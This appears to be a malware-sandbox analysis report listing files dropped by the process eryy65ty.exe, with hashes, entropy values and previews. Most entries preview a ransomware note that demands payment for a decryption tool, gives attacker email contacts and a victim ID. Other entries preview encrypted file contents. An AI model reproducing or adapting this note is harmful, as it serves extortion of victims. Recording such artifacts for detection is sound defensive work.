                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1284
                                                                                                                                              Entropy (8bit):7.845649856322174
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:oghE5OKn3hPrjQLQgdkuQaT1vZJTrPyUDz59zdwmYhQ0TkWVgQQvjute+WyO:DhdehPr3gZhpPKO59zdwmYhBQRSA+WyO
                                                                                                                                              MD5:891F69A0AB8F1FBF3CFEAAAFF61F6B96
                                                                                                                                              SHA1:E8A77247A1E99CAEEA77E83E54EC32487A382002
                                                                                                                                              SHA-256:DA63C2E52150CBFA71712BF236156C2810742DD1AA88190EB3B01308CF5DC7AD
                                                                                                                                              SHA-512:34B924EE86BC56A77F4BC471DF033F8A5A13A7DDFD41D53D71322C7CDC9B28FC7ECBF8FEAC18493689D54C099DA752ED6807EF5C36B0B8177E6FC77A6D431B1B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.s...<8g.....j......}m\&.lU.ME....}..:.UEv.....Ho...P.....=.j>....Kj.......+.).2.+;..ex.!.."Jq.h.lh..V...5...4.e..</~)|*.V.*...3rp..!~.9.........<.:...P......XGS.;.....t..x....b..V=.=.G..k:.2..U...........2?$.3.!.S..Jy.jK..+.....pB....=..U.....TV...5.M...]xV..#.H1dg..&.:8...?.b}o.|.......,m.-.QC......O....:N.o.JjC]FTW...,.y..Y.2v...N.4....&w......d....5..f.!.....Q.j..:..3.r..Q...lY.+....Th...{.....K.y.{.l..9.b.T......sd8.V..i++..e....L.d....V*f{#..u..h=..{c.@~.G1{..L......@.:.C;..%...xI...I...v..~...R........e.-\8 .>b.k...[.b......u..l'lE5Vd...V.f....!.H`.-HJ"......U.Lc.L..F..*V`. ..e..a.M?Y,~..O."T.....3..?PQ....Z.... .8......]]..S./...%..>A.V>0';.4..cH....}....:....~...;._...6[....:.....3...L..(.I.<@.....yg.USK.|5p.....&c).....c..|BK...&OF....`<..$.u......g....3....V.-.*..-.....A.7.......E...k.b....H]U3....ZHF<.]..I!nd.)....gK&~......L-.m.6.i.n.$....:..}.0.V.BJY>g....N.+!.CVa...tS.......CUW..........:.e..$..8.......%.JL..d........
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1284
                                                                                                                                              Entropy (8bit):7.845649856322174
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:oghE5OKn3hPrjQLQgdkuQaT1vZJTrPyUDz59zdwmYhQ0TkWVgQQvjute+WyO:DhdehPr3gZhpPKO59zdwmYhBQRSA+WyO
                                                                                                                                              MD5:891F69A0AB8F1FBF3CFEAAAFF61F6B96
                                                                                                                                              SHA1:E8A77247A1E99CAEEA77E83E54EC32487A382002
                                                                                                                                              SHA-256:DA63C2E52150CBFA71712BF236156C2810742DD1AA88190EB3B01308CF5DC7AD
                                                                                                                                              SHA-512:34B924EE86BC56A77F4BC471DF033F8A5A13A7DDFD41D53D71322C7CDC9B28FC7ECBF8FEAC18493689D54C099DA752ED6807EF5C36B0B8177E6FC77A6D431B1B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.s...<8g.....j......}m\&.lU.ME....}..:.UEv.....Ho...P.....=.j>....Kj.......+.).2.+;..ex.!.."Jq.h.lh..V...5...4.e..</~)|*.V.*...3rp..!~.9.........<.:...P......XGS.;.....t..x....b..V=.=.G..k:.2..U...........2?$.3.!.S..Jy.jK..+.....pB....=..U.....TV...5.M...]xV..#.H1dg..&.:8...?.b}o.|.......,m.-.QC......O....:N.o.JjC]FTW...,.y..Y.2v...N.4....&w......d....5..f.!.....Q.j..:..3.r..Q...lY.+....Th...{.....K.y.{.l..9.b.T......sd8.V..i++..e....L.d....V*f{#..u..h=..{c.@~.G1{..L......@.:.C;..%...xI...I...v..~...R........e.-\8 .>b.k...[.b......u..l'lE5Vd...V.f....!.H`.-HJ"......U.Lc.L..F..*V`. ..e..a.M?Y,~..O."T.....3..?PQ....Z.... .8......]]..S./...%..>A.V>0';.4..cH....}....:....~...;._...6[....:.....3...L..(.I.<@.....yg.USK.|5p.....&c).....c..|BK...&OF....`<..$.u......g....3....V.-.*..-.....A.7.......E...k.b....H]U3....ZHF<.]..I!nd.)....gK&~......L-.m.6.i.n.$....:..}.0.V.BJY>g....N.+!.CVa...tS.......CUW..........:.e..$..8.......%.JL..d........
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2356
                                                                                                                                              Entropy (8bit):7.918280148398814
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:VLRsgJ8CB8plzRr5+M396wB3qx+jpAOK9Ylv1dfDbGwK4kTH62yMj1oZli:VlsgJ8CB87zRAa9RgeAv9O1dfDbhWrkK
                                                                                                                                              MD5:BAC6D449952B747BDB0322E6893AA3C4
                                                                                                                                              SHA1:AD5347340A988C440B8501B5B3F10AD8A12A00E2
                                                                                                                                              SHA-256:1C2A372B01240488251C88791FDDEF49FF8B547655AAFE75FC2A445CDFD591FC
                                                                                                                                              SHA-512:4F2FEE6794AA73D745AAA3E9B3E9C112910C1DA2C91E9F7277592CE7C8A1B7378F2ACD5B83A5BC3DA49F9FBB7D436B58FC7A281BBEEE5225C5770D93570C74BA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.../.......w(.@Y...p..+...fx.G.L..`tl....z..Yj...<<..f......w\.G,..l.N&y.S..{6..9..2..%..=A.d....c.j....U/K..Z|....2..$w.-u#.e.!...|..%..|.Z.......J......&...6.......E.:1..N..A..q.l...J{u...925.5..@.M,zR%...W..`0o./.U..YK.}...).mqC~....5T#..|..J...pQ........../...Vg!Q...}...(...K.-....Z..p...o.oo..i.j....dA.>..I....BaQ1..-......9..].........B7^..i`pa3.....X)..i.9r.....%`T...Pj..C..q.&F...k.."..Ax....zZko/v>.z..4.^.T....~....*...l.........8(C.Lv...j.....7N.....@..;..E.B/K9W..V.... .Bg\.\.@?.p.I....2......h@.....#nF.!..?p......c..o<..unPO....$...r{N.f.1m.4.Y.:...bQl|)9.....5....>.+]_)y.@\\....dyS..jQ.wQ{.Ms...b]K....c..LI8D.0.H3j.)(|.j.*........ql..`m...Y....5...l....c....q.$..q5."...A.\.x.y.+.6D..;\&q.z..ByR/s][.....k...R4.....X...d..[..#2.N1W.X.J,..2.y.".Gw.i......g.m.>_A..+...W..3..b..-..3.>.-.J.{..h...|.V....l.D!..L.....R/..*......\(.2...^Y.D..]...t.Nlb.".i7hc..d....u....g1C.6.H.............l.'.=........{...6;.Ll.Vv#.....mr$
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2356
                                                                                                                                              Entropy (8bit):7.918280148398814
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:VLRsgJ8CB8plzRr5+M396wB3qx+jpAOK9Ylv1dfDbGwK4kTH62yMj1oZli:VlsgJ8CB87zRAa9RgeAv9O1dfDbhWrkK
                                                                                                                                              MD5:BAC6D449952B747BDB0322E6893AA3C4
                                                                                                                                              SHA1:AD5347340A988C440B8501B5B3F10AD8A12A00E2
                                                                                                                                              SHA-256:1C2A372B01240488251C88791FDDEF49FF8B547655AAFE75FC2A445CDFD591FC
                                                                                                                                              SHA-512:4F2FEE6794AA73D745AAA3E9B3E9C112910C1DA2C91E9F7277592CE7C8A1B7378F2ACD5B83A5BC3DA49F9FBB7D436B58FC7A281BBEEE5225C5770D93570C74BA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.../.......w(.@Y...p..+...fx.G.L..`tl....z..Yj...<<..f......w\.G,..l.N&y.S..{6..9..2..%..=A.d....c.j....U/K..Z|....2..$w.-u#.e.!...|..%..|.Z.......J......&...6.......E.:1..N..A..q.l...J{u...925.5..@.M,zR%...W..`0o./.U..YK.}...).mqC~....5T#..|..J...pQ........../...Vg!Q...}...(...K.-....Z..p...o.oo..i.j....dA.>..I....BaQ1..-......9..].........B7^..i`pa3.....X)..i.9r.....%`T...Pj..C..q.&F...k.."..Ax....zZko/v>.z..4.^.T....~....*...l.........8(C.Lv...j.....7N.....@..;..E.B/K9W..V.... .Bg\.\.@?.p.I....2......h@.....#nF.!..?p......c..o<..unPO....$...r{N.f.1m.4.Y.:...bQl|)9.....5....>.+]_)y.@\\....dyS..jQ.wQ{.Ms...b]K....c..LI8D.0.H3j.)(|.j.*........ql..`m...Y....5...l....c....q.$..q5."...A.\.x.y.+.6D..;\&q.z..ByR/s][.....k...R4.....X...d..[..#2.N1W.X.J,..2.y.".Gw.i......g.m.>_A..+...W..3..b..-..3.>.-.J.{..h...|.V....l.D!..L.....R/..*......\(.2...^Y.D..]...t.Nlb.".i7hc..d....u....g1C.6.H.............l.'.=........{...6;.Ll.Vv#.....mr$
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2313
                                                                                                                                              Entropy (8bit):7.916443566796818
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:zF1wAWLFNw9m0+9ATz60PD/QO3xO60nVpEUY3p+0sYFXba:Z1wBLzI/DaMD/JxOTnfDr0som
                                                                                                                                              MD5:35327FA15B8336133865641B4728050D
                                                                                                                                              SHA1:56ADE644A3CCDF3E411FBFA28EDFBF8DF0D2BBBE
                                                                                                                                              SHA-256:819B1E90AF94FA62DB1A7D03810851D52A5B83609B822469203AA789D99AC637
                                                                                                                                              SHA-512:B662D3CDA41379ADAEC6B1A97FFAD37EA2A33D8D6785FD768308ED22EAAB531A8C810C762D2B487A6B7141074E53BA915DC0FB9D61CD1150A5CAD415896F7E25
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:y...ChS.u.FY.D...v..I=-fm..~=Z.w.t.DA~.O...JCw.h.I.B......N.6.._.Z.."'....H:...c......zv..y"..g.F\!sz.'.<}..:....E.A.....e.V.q.g.w.o.Gv!^....(.~.m..Y~`.X.n.@..0.j.W..wg.]].*.].-.m.r.e.._......_..T...........w.....Q.....%....!.g... ....dy.2G..b...^lNB2.QsR...zhE.......F..oW...A,..)..?7...%......V..D..kA.2.&.U.^j....q..>{....<.H'...6.b%v<.ze.:k.M.m..f.U.g.Zu...3.5c4...../Hd.`$......ib..K$-.m .[....9{2>...,..b...z.....b.g..j.+.K.-.,U.+.I....j.:....eP...H..c..Q.c_....s8.a...iCG>...f.../r..7....#_Dx..0.5..".Z.oX..z..j..I.;...7X.-..T...1...m^l............._n..yG .N..v..{..L'_.w.)`a........nQ.<..\e@QM.9@..s/......D..8D....-D.r..2`#J....5b06...5Cs{Ba..j...a...H.*.%.....2q..v....Y...)..J.J._....P..6.4...]...oe}E.+..R.....*G.....eo.,-.r.d....B?C...X.W.o..}-.p.,...2.c]..... imB-..$.Y"....o...2i/L..W....!k..^CM.xy.]..$..v..g@.t.L....p..N.Q .....g.^.z...P.....'bA.k5.j.4.y.>*..d.I....v]D>..HX..y.\...w.l.l.....~..1...m.l..!.."....o.SJ^..-.-.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2313
                                                                                                                                              Entropy (8bit):7.916443566796818
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:zF1wAWLFNw9m0+9ATz60PD/QO3xO60nVpEUY3p+0sYFXba:Z1wBLzI/DaMD/JxOTnfDr0som
                                                                                                                                              MD5:35327FA15B8336133865641B4728050D
                                                                                                                                              SHA1:56ADE644A3CCDF3E411FBFA28EDFBF8DF0D2BBBE
                                                                                                                                              SHA-256:819B1E90AF94FA62DB1A7D03810851D52A5B83609B822469203AA789D99AC637
                                                                                                                                              SHA-512:B662D3CDA41379ADAEC6B1A97FFAD37EA2A33D8D6785FD768308ED22EAAB531A8C810C762D2B487A6B7141074E53BA915DC0FB9D61CD1150A5CAD415896F7E25
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:y...ChS.u.FY.D...v..I=-fm..~=Z.w.t.DA~.O...JCw.h.I.B......N.6.._.Z.."'....H:...c......zv..y"..g.F\!sz.'.<}..:....E.A.....e.V.q.g.w.o.Gv!^....(.~.m..Y~`.X.n.@..0.j.W..wg.]].*.].-.m.r.e.._......_..T...........w.....Q.....%....!.g... ....dy.2G..b...^lNB2.QsR...zhE.......F..oW...A,..)..?7...%......V..D..kA.2.&.U.^j....q..>{....<.H'...6.b%v<.ze.:k.M.m..f.U.g.Zu...3.5c4...../Hd.`$......ib..K$-.m .[....9{2>...,..b...z.....b.g..j.+.K.-.,U.+.I....j.:....eP...H..c..Q.c_....s8.a...iCG>...f.../r..7....#_Dx..0.5..".Z.oX..z..j..I.;...7X.-..T...1...m^l............._n..yG .N..v..{..L'_.w.)`a........nQ.<..\e@QM.9@..s/......D..8D....-D.r..2`#J....5b06...5Cs{Ba..j...a...H.*.%.....2q..v....Y...)..J.J._....P..6.4...]...oe}E.+..R.....*G.....eo.,-.r.d....B?C...X.W.o..}-.p.,...2.c]..... imB-..$.Y"....o...2i/L..W....!k..^CM.xy.]..$..v..g@.t.L....p..N.Q .....g.^.z...P.....'bA.k5.j.4.y.>*..d.I....v]D>..HX..y.\...w.l.l.....~..1...m.l..!.."....o.SJ^..-.-.
